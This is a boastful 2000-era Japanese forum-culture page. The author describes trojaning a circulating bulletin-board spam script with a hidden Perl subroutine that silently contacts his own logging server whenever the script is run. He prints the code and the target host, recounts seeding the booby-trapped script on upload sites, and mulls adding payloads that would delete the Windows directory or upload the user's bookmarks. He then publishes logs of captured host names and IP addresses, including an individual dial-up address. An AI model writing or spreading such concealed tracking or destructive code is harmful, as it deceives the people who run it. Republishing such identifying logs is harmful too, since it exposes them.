＠みらい荒らし追っかけ編

Waffen　GuessGesu.

うぜえ荒らしを始末しろヽ(`Д´)ﾉ

さて随分と前から＠みらいにはｴﾎﾟｷｼ樹脂並の粘着力を誇る荒らしが居座っているのは皆さんご存知の通りである。

漏れも何度か( '-')ﾉ にメルしたけど一向に対策されないのである案を練っていた。一応( '-')ﾉ にメルで伝えたのだが応答がないので勝手に実行する事に決定。

だが( '-')ﾉ が串を片っ端？から弾いてしまったので一時作戦を中断するしかなくなっていた。

ところがさっき（12月15日22時頃）見たら串が通るｼﾞｬｿヽ(´ー｀)ノﾗｰｲ

早速実行に移す。

小さなる罠開発庁

大いなるはｶﾞﾌﾞﾘｴﾙ弥太郎に任せてあるので、漏れとしては小さい罠かつ適当で手間の掛からない簡単な罠を仕掛ける事にした。

何かといえば、バラ撒かれてるアホスクリプトに生でENV踏むようなルーチンを咥えさせてイカす。などというﾁｬﾝｺﾛでも思いつきそうな仕掛けである。ワレながら情けない。

---

つい先日、マグロの旧ハンドルをもじったHNでつまらん板に書いたら、てぶくろも知らない香具師に絡まれた。

のは関係なくて、関係あるのはそこの内容。

大昔に作った実験途中のえみる時計、を猿が改造したらしい、「自動レスｽｸﾘﾌﾟ�d」を拾ってきた。ってのは結構前なんだけど。

幼稚なスクリプトだなｸﾞﾗｧヽ(`Д´)ﾉ

変数1個1個取り出してんなよ猿...ヾ(`Д´)

はいいとして、次のサブルーチンを追加した。

sub get_mi1{
$Port = 80;$addr = gethostbyname($hostname);
$Proto = getprotobyname("tcp");
$proc = pack('S n a4 x8', &AF_INET, $Port, $addr);
socket(S, &AF_INET, &SOCK_STREAM, $Proto);
connect(S, $proc);select(S);$|=1;select(STDOUT);
print S "GET /home/sys/bbs.cgi HTTP/1.0\n
User-Agent: Mozilla/4.0 (compatible; MSIE 4.03; Windows 2000)\n
Accept: application/msword, */*\n
Accept-Language: ja\n
Referer: $victim$get1\n
Accept-Encoding: gzip, deflate\n
Host: $hostname\n\n";
close(S);
}

他のサブルーチンにenvのホストも追加。

$hostname = "www11.tok2.com";

要は、生でenv踏んでくれるようにヽ(´ー｀)ノ

---

尚、kurumiの方をしなかったのは試しに踏んだらエラーになったので、原因解明してる暇がなかったんで(;´Д`)

なんとしても23時までには配布しておくべきだと思ったわけっす。

もう一つ、こっちのenvでもエージェントなんかがログに残らない。なぜだろ？

ｳﾞｧｰﾁｬﾙ阿部あたりで動かされた場合を考えてパスなんか残るように（ローカルでもパス抜いて環境分かるように等）とかとか、あとはローカルだったらWindowsディレクトリ全部deleteするとか、ﾌﾞｸﾏｸ圧縮してｱﾌﾟﾛﾀﾞに登録するとかいろいろ考えたけど、時間ないからやめ。

報復出来ないのがｻﾞﾝﾈｿヽ(´Д｀;)ﾉ

---

さて、出来上がった地雷入りスクリプトは、例の如くまりぺに登録。

ついでみらいに宣伝、転載に転載。猿板に書こうとしたら串で弾かれたのでクリ島で我慢。ﾘﾐｸｿには、らしい板立てて宣伝。

あとは食いつくのを待つばかり・・・・・・。

---

結果！

パパ！釣れたよ！

server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)03時24分33秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)03時24分27秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)03時24分21秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)03時24分11秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)03時24分04秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)03時23分57秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)03時23分51秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)03時23分46秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)03時23分40秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)03時23分32秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)03時23分23秒]

略

server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分44秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分42秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分40秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分39秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分38秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分38秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分36秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分33秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分32秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分32秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分30秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分27秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分27秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分27秒] server2023.virtualave.net - 208.146.45.33 - - - - [2000/12/16(土)01時58分27秒]

延々と続くこの猿はやっぱりﾊﾞｰﾁｬﾙ阿部で実行みたいな。( '-')ﾉ さん、問い合わせたら？吐くよきっと。わら。

かなり長時間撃ってたようで、下の方のログは消えている。

なんだｺｲｼだけかよ？と思うなかれ、しっかり生も釣れている。

[2000/12/16(土)03時40分37秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時40分28秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時40分14秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時39分53秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時39分44秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時39分35秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時39分23秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時39分13秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時39分04秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時38分53秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時38分40秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時38分28秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時38分13秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時38分03秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時37分51秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時37分42秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時37分34秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時37分18秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時36分53秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時36分41秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - - [2000/12/16(土)03時36分04秒] RYUcc-03p44.ppp.odn.ad.jp - 210.188.106.44 - - - -

ｺｲｼは散発的に撃ってるけど、最初に撃ったのは誰より早い（漏れが実験で撃ったの除いて）23時台である。

---

http://www11.tok2.com/home/sys/bbs.txt

どうぞ、皆さんも確かめてご覧アレ。

あとガキ

現在はこのスクリプトで攻撃出来なくなっている。ちょっと改造すれば出来るみたいだけどね。わら。

なお、その対策ってのはかなり早い時間帯にされたみたい？で、1時頃に漏れが煽りで荒らしたのを除くと、殺る気でやった香具師らの攻撃はヒットしてなかったりする。

ところで( '-')ﾉ に対策教えたのって誰なんだろ？